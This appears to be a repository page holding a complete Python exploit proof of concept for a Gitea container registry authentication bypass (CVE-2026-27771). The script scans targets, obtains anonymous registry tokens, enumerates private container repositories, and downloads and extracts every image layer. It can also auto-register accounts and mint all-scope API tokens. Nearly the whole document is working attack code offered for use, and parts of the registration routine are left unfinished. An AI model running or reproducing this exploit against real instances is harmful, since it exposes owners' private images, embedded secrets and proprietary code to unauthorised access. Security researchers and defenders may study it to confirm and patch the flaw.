README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-27771 Gitea Container Registry Auth Bypass - Exploit PoC
Gitea < 1.26.2 ghost-user container pull exploit.
The ReqContainerAccess middleware only checks RequireSignInViewStrict.
It does NOT check package owner visibility. Ghost users (UserID:-1)
can pull ALL container packages without authentication.
Usage:
# Scan mode (discovery only)
python3 CVE-2026-27771-exploit.py scan https://gitea.example.com
# Scan with existing token
python3 CVE-2026-27771-exploit.py scan https://gitea.example.com --token <jwt>
# Pull mode (enumerate repos, tags, manifests and layers)
python3 CVE-2026-27771-exploit.py pull https://gitea.example.com
# Pull with existing token
python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --token <jwt>
# Pull a specific repo
python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --repo owner/image
# Dry-run: show what would be pulled without downloading layers
python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --dry-run
# Register a new account (if no captcha)
python3 CVE-2026-27771-exploit.py register https://gitea.example.com --username user --password pass --email [email protected]
References:
https://noscope.com/blog/gitea-instances-exposing-private-container
https://blog.gitea.com/release-of-1.26.2/
"""
import base64
import io
import json
import os
import re
import sys
import tarfile
import urllib.request
import urllib.error
import ssl
import http.cookiejar
import urllib.parse
# ---- helpers ----
ssl_ctx = ssl.create_default_context()
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
OCI_MANIFEST_ACCEPT = (
"application/vnd.docker.distribution.manifest.v2+json,"
"application/vnd.docker.distribution.manifest.list.v2+json,"
"application/vnd.oci.image.manifest.v1+json,"
"application/vnd.oci.image.index.v1+json"
)
cj = http.cookiejar.CookieJar()
def fetch(url, headers=None):
req = urllib.request.Request(url, headers=headers or {})
try:
resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx)
return resp.status, resp.headers, resp.read()
except urllib.error.HTTPError as e:
return e.code, e.headers, e.read()
except Exception as e:
return 0, {}, str(e).encode()
def fetch_auth(url, headers=None):
req = urllib.request.Request(url, headers=headers or {})
cj.add_cookie_header(req)
try:
resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx)
cj.extract_cookies(resp, req)
return resp.status, resp.headers, resp.read()
except urllib.error.HTTPError as e:
cj.extract_cookies(e, req)
return e.code, e.headers, e.read()
except Exception as e:
return 0, {}, str(e).encode()
def post_form(url, data, headers=None):
body = urllib.parse.urlencode(data).encode()
hdrs = {"Content-Type": "application/x-www-form-urlencoded"}
if headers:
hdrs.update(headers)
req = urllib.request.Request(url, data=body, headers=hdrs)
cj.add_cookie_header(req)
try:
resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx)
cj.extract_cookies(resp, req)
return resp.status, resp.headers, resp.read()
except urllib.error.HTTPError as e:
cj.extract_cookies(e, req)
return e.code, e.headers, e.read()
except Exception as e:
return 0, {}, str(e).encode()
def decode_jwt_payload(token):
try:
payload = token.split(".")[1]
payload += "=" * (4 - len(payload) % 4)
return json.loads(base64.urlsafe_b64decode(payload))
except Exception:
return {}
def is_pat(token):
"""Check if token is a Gitea personal access token (40-char hex SHA1)."""
return bool(re.fullmatch(r'[0-9a-f]{40}', token, re.I))
def exchange_pat(base, username, pat):
"""Exchange a personal access token for an OCI registry JWT."""
b = base.rstrip("/")
creds = base64.b64encode(f"{username}:{pat}".encode()).decode()
st, _, body = fetch(
b + "/v2/token?service=container_registry&scope=*",
{"Authorization": f"Basic {creds}"},
)
if st == 200:
try:
j = json.loads(body)
return j.get("token")
except Exception:
return None
return None
def parse_version(v):
try:
return [int(x) for x in v.lstrip("v").split("-")[0].split(".")[:3]]
except Exception:
return None
# ---- registration ----
def cmd_register(base, username, password, email):
b = base.rstrip("/")
if not b.startswith("http"):
b = f"https://{b}"
print(f"[*] Checking registration at {b}")
st, _, body = fetch(b + "/user/sign_up")
if st != 200:
print(f"[-] Cannot access registration page (HTTP {st})")
sys.exit(1)
page = body.decode("utf-8", errors="replace")
if "Registration is disabled" in page:
print("[-] Registration is disabled on this instance")
sys.exit(1)
has_fields = all(x in page for x in ["user_name", "email", "password"])
if not has_fields:
print("[-] Registration form has no input fields (likely JS-rendered or disabled)")
sys.exit(1)
has_captcha = "captcha_id" in page or "captcha" in page
if has_captcha:
print("[-] Captcha present — cannot auto-register")
print(" Register manually, then get a token from Settings > Applications > Generate Token")
print(" Pass it with: --token <sha1_token>\n")
sys.exit(1)
m = re.search(r'name="_csrf" value="([^"]+)"', page)
if not m:
print("[-] Could not find CSRF token")
sys.exit(1)
csrf = m.group(1)
data = {
"_csrf": csrf,
"user_name": username,
"email": email,
"password": password,
"retype": password,
}
print(f"[*] Registering user '{username}'...")
st, hd, body = post_form(b + "/user/sign_up", data)
loc = hd.get("Location", "")
if st == 302 and "/user/login" in loc:
print("[+] Registration successful!")
elif b"/user/sign_up" in body:
print("[-] Registration failed (page returned)")
sys.exit(1)
else:
print(f"[+] Registration appears successful (HTTP {st})")
print("[*] Logging in...")
st, _, body = fetch(b + "/user/login")
page = body.decode("utf-8", errors="replace") if st == 200 else ""
m = re.search(r'name="_csrf" value="([^"]+)"', page)
if not m:
print("[-] Could not get login CSRF")
sys.exit(1)
csrf = m.group(1)
data = {"_csrf": csrf, "user_name": username, "password": password}
st, hd, body = post_form(b + "/user/login", data)
if st not in (200, 302):
print(f"[-] Login failed (HTTP {st})")
sys.exit(1)
print("[+] Logged in!")
print("[*] Getting API token...")
st, _, body = fetch_auth(b + f"/api/v1/users/{username}/tokens")
existing_tokens = []
if st == 200:
existing_tokens = json.loads(body)
for t in existing_tokens:
if t.get("name") == "cve-poc":
token_val = fetch_auth(b + f"/api/v1/users/{username}/tokens/{t['id']}")
print(f"[!] Token 'cve-poc' already exists")
# Actually we can't get the value back, need to create new one
# Delete it first
# ...
# Get CSRF for token creation
st, _, body = fetch_auth(b + f"/api/v1/users/{username}/tokens")
page = body.decode("utf-8", errors="replace") if st != 200 else "{}"
csrf_token = None
for h in cj:
if h.name == "_csrf":
csrf_token = h.value
break
if not csrf_token:
csrf_token = ""
try:
data = json.loads(body) if isinstance(body, bytes) and st == 200 else {}
except:
pass
# Try creating token via API
import urllib.request
token_data = json.dumps({"name": "cve-poc", "scopes": ["all"]}).encode()
req = urllib.request.Request(
b + f"/api/v1/users/{username}/tokens",
data=token_data,
headers={
"Content-Type": "application/json",
"X-Csrf-Token": csrf_token or "",
}
)
cj.add_cookie_header(req)
try:
resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx)
token_json = json.loads(resp.read())
token_val = token_json.get("sha1", "")
print(f"[+] Token created: {token_val[:20]}...")
print(f"\n Use with: --token {token_val}")
except urllib.error.HTTPError as e:
body = e.read()
try:
err = json.loads(body)
print(f"[-] Token creation failed: {err.get('message', body.decode())}")
except:
print(f"[-] Token creation failed (HTTP {e.code}): {body.decode()[:200]}")
# Fallback: extract session and use it directly in the OCI flow
print("[*] Falling back: getting container token via session...")
st, _, body = fetch_auth(b + "/v2/token?service=container_registry&scope=*")
if st == 200:
j = json.loads(body)
t = j.get("token", "")
payload = decode_jwt_payload(t)
print(f"[+] Container token (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
print(f"\n Use with: --token {t}")
# ---- registration check (for scan output) ----
def check_registration(base):
b = base.rstrip("/")
st, _, body = fetch(b + "/user/sign_up")
if st != 200:
return
page = body.decode("utf-8", errors="replace")
if "Registration is disabled" in page:
return
has_fields = all(x in page for x in ["user_name", "email", "password"])
if not has_fields:
return
has_captcha = "captcha_id" in page or "captcha" in page
if has_captcha:
print("[+] Registration: OPEN (captcha present — register manually)")
else:
print("[+] Registration: OPEN (no captcha — use 'register' command)")
# ---- pre-flight check ----
def preflight(base, provided_token=None):
"""Check version, registry presence, REQUIRE_SIGNIN_VIEW status."""
print(f"[*] Pre-flight: {base}")
b = base.rstrip("/")
st, _, body = fetch(b + "/")
if st != 200:
print(f"[-] Not reachable (HTTP {st})")
sys.exit(1)
page = body.decode("utf-8", errors="replace")
if "gitea" not in page.lower():
print("[-] Not a Gitea instance")
sys.exit(1)
version = None
st, _, body = fetch(b + "/api/v1/version")
if st == 200:
try:
version = json.loads(body).get("version", "unknown")
print(f"[+] Version (API): {version}")
except Exception:
pass
elif st == 403:
print("[*] API requires sign-in (HTTP 403)")
m = re.search(r'(?:Gitea|gitea)[^v]*v?(\d+\.\d+\.\d+)', page)
if m:
version = m.group(1)
print(f"[+] Version (page): {version}")
ver = parse_version(version)
cutoff = parse_version("1.26.2")
if ver and not (ver[0] < cutoff[0] or (ver[0] == cutoff[0] and ver[1] < cutoff[1]) or
(ver[0] == cutoff[0] and ver[1] == cutoff[1] and ver[2] < cutoff[2])):
print("[-] Version >= 1.26.2 (patched) — not vulnerable to CVE-2026-27771")
sys.exit(1)
st, hd, _ = fetch(b + "/v2/")
if st not in (200, 401):
print(f"[-] /v2/ -> {st} (no container registry)")
sys.exit(1)
www = hd.get("WWW-Authenticate", "")
print(f"[+] /v2/ -> {st} (WWW-Authenticate: {www[:90]})")
check_registration(b)
token = provided_token
require_signin = False
if token:
if is_pat(token):
print("[+] Provided token is a personal access token (SHA1)")
print("[*] Exchanging PAT for OCI registry JWT...")
username = None
if "--username" in sys.argv:
i = sys.argv.index("--username")
username = sys.argv[i+1]
while not username:
username = input(" Enter your Gitea username: ").strip()
jwt = exchange_pat(b, username, token)
if jwt:
token = jwt
payload = decode_jwt_payload(token)
print(f"[+] JWT obtained (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
else:
print("[-] PAT exchange failed — check username/token")
sys.exit(1)
else:
payload = decode_jwt_payload(token)
print(f"[+] Using provided token (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
else:
st, _, body = fetch(b + "/v2/token?service=container_registry&scope=*")
if st == 200:
try:
j = json.loads(body)
token = j.get("token")
payload = decode_jwt_payload(token)
print(f"[+] Anonymous token granted (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
except Exception:
print("[-] Token response not parseable")
else:
print(f"[*] Token endpoint -> {st} (REQUIRE_SIGNIN_VIEW likely true)")
require_signin = True
if token:
st, _, body = fetch(b + "/v2/_catalog", {"Authorization": f"Bearer {token}"})
repos = json.loads(body).get("repositories", []) if st == 200 else []
print(f"[+] /v2/_catalog -> {st} ({len(repos)} repos)")
else:
repos = []
vuln = version is not None and "1.26.2" not in version and not require_signin
print(f"[+] Vulnerable: {vuln} (require_signin={require_signin})")
print()
return {"base": b, "version": version, "token": token, "repos": repos,
"require_signin": require_signin, "vuln": vuln}
# ---- OCI operations ----
def get_catalog(base, token):
st, _, body = fetch(base + "/v2/_catalog", {"Authorization": f"Bearer {token}"})
if st == 200:
return json.loads(body).get("repositories", [])
return []
def get_tags(base, token, repo):
st, _, body = fetch(base + f"/v2/{repo}/tags/list", {"Authorization": f"Bearer {token}"})
if st == 200:
return json.loads(body).get("tags", [])
return []
def get_manifest(base, token, repo, ref):
st, hd, body = fetch(base + f"/v2/{repo}/manifests/{ref}", {
"Authorization": f"Bearer {token}",
"Accept": OCI_MANIFEST_ACCEPT,
})
if st == 200:
try:
return json.loads(body)
except Exception:
return None
return None
def download_blob(base, token, repo, digest, outdir):
st, hd, body = fetch(base + f"/v2/{repo}/blobs/{digest}", {
"Authorization": f"Bearer {token}",
})
if st == 200:
safe = digest.replace(":", "_")
path = os.path.join(outdir, f"{safe}.blob")
with open(path, "wb") as f:
f.write(body)
return len(body), path, body
return 0, None, None
def pull_image(base, token, repo, tag, outdir, dry_run):
print(f" └─ manifest {tag}: ", end="", flush=True)
manifest = get_manifest(base, token, repo, tag)
if not manifest:
print("FAIL (no manifest)")
return
layers = []
plat_manifest = None
media_type = manifest.get("mediaType", "")
if "manifest.list" in media_type or "index" in media_type:
for m in manifest.get("manifests", []):
if m.get("platform", {}).get("architecture") == "amd64" and \
m.get("platform", {}).get("os") == "linux":
print(f"multi-arch, digest={m['digest'][:20]}...", end="")
plat_manifest = get_manifest(base, token, repo, m["digest"])
if plat_manifest:
for l in plat_manifest.get("layers", []):
layers.append(l["digest"])
cd = plat_manifest.get("config", {}).get("digest")
if cd:
layers.append(cd)
else:
for l in manifest.get("layers", []):
layers.append(l["digest"])
config_digest = manifest.get("config", {}).get("digest")
if config_digest:
layers.append(config_digest)
print(f", {len(layers)} blobs", end="")
if dry_run:
print(" (dry-run, skipped)")
return
print()
blob_dir = os.path.join(outdir, "blobs")
extract_dir = os.path.join(outdir, "extracted")
os.makedirs(blob_dir, exist_ok=True)
os.makedirs(extract_dir, exist_ok=True)
downloaded = []
for i, d in enumerate(layers):
sz, path, data = download_blob(base, token, repo, d, blob_dir)
if sz:
safe_name = d.replace(":", "_")[:50]
size_str = f"{sz} bytes"
if sz > 1024 * 1024:
size_str = f"{sz / 1024 / 1024:.1f} MB"
elif sz > 1024:
size_str = f"{sz / 1024:.1f} KB"
print(f" [{i+1}/{len(layers)}] {safe_name}... ({size_str})")
downloaded.append((path, data))
else:
print(f" [{i+1}/{len(layers)}] {d[:30]}... FAILED")
man_path = os.path.join(outdir, f"manifest_{tag}.json")
with open(man_path, "w") as f:
json.dump(manifest, f, indent=2)
man2_path = os.path.join(outdir, f"plat_manifest_{tag}.json")
if "manifest.list" in media_type or "index" in media_type:
with open(man2_path, "w") as f:
json.dump(plat_manifest if plat_manifest else {}, f, indent=2)
print(f" manifests saved")
total_extracted = 0
for blob_path, blob_data in downloaded:
if blob_data and blob_data[:2] in (b"\x1f\x8b", b"\x1f\x9d"):
try:
with tarfile.open(fileobj=io.BytesIO(blob_data), mode="r:*") as tf:
members = [m for m in tf.getmembers() if not m.name.startswith(".wh.")]
tf.extractall(path=extract_dir, members=members)
total_extracted += len(members)
except Exception:
pass
if total_extracted:
print(f" extracted {total_extracted} files to {extract_dir}")
# ---- commands ----
def cmd_scan(cfg):
base = cfg["base"]
token = cfg["token"]
require_signin = cfg["require_signin"]
if not token:
print("[!] No token available — scan limited")
print(" Get a token: Settings > Applications > Generate Token")
print(" Pass it with: --token <sha1_token>\n")
return
repos = get_catalog(base, token)
print(f"[*] Container repositories: {len(repos)}")
for repo in repos:
tags = get_tags(base, token, repo)
print(f" {repo}: tags={tags}")
if not repos:
print(" (none — no container packages exist)")
print()
def cmd_pull(cfg, specific_repo=None, dry_run=False):
base = cfg["base"]
token = cfg["token"]
if not token:
print("[!] Cannot pull — no token available")
print(" Get a token: Settings > Applications > Generate Token")
print(" Pass it with: --token <sha1_token>")
return
if specific_repo:
repos_to_pull = [specific_repo]
else:
repos_to_pull = get_catalog(base, token)
print(f"[*] Found {len(repos_to_pull)} repos in catalog")
for repo in repos_to_pull:
print(f"\n [{repo}]")
tags = get_tags(base, token, repo)
print(f" Tags: {tags}")
if not tags:
print(" (no tags)")
continue
safe_repo = repo.replace("/", "_").replace(":", "_")
outdir = f"pulled_{safe_repo}"
if dry_run:
outdir = "/dev/null"
for tag in tags:
pull_image(base, token, repo, tag, outdir, dry_run)
# ---- main ----
if __name__ == "__main__":
if len(sys.argv) < 3:
print(__doc__)
sys.exit(1)
command = sys.argv[1]
target = sys.argv[2]
specific_repo = None
dry_run = False
provided_token = None
if "--token" in sys.argv:
i = sys.argv.index("--token")
provided_token = sys.argv[i+1]
if "--repo" in sys.argv:
i = sys.argv.index("--repo")
specific_repo = sys.argv[i+1]
if "--dry-run" in sys.argv:
dry_run = True
if command == "register":
username = None
password = None
email = None
if "--username" in sys.argv:
i = sys.argv.index("--username")
username = sys.argv[i+1]
if "--password" in sys.argv:
i = sys.argv.index("--password")
password = sys.argv[i+1]
if "--email" in sys.argv:
i = sys.argv.index("--email")
email = sys.argv[i+1]
if not all([username, password, email]):
print("Usage: register https://gitea.example.com --username u --password p --email [email protected]")
sys.exit(1)
cmd_register(target, username, password, email)
sys.exit(0)
if not target.startswith("http"):
target = f"https://{target}"
cfg = preflight(target, provided_token=provided_token)
if command == "scan":
cmd_scan(cfg)
elif command == "pull":
cmd_pull(cfg, specific_repo, dry_run)
else:
print(f"Unknown command: {command}")
sys.exit(1)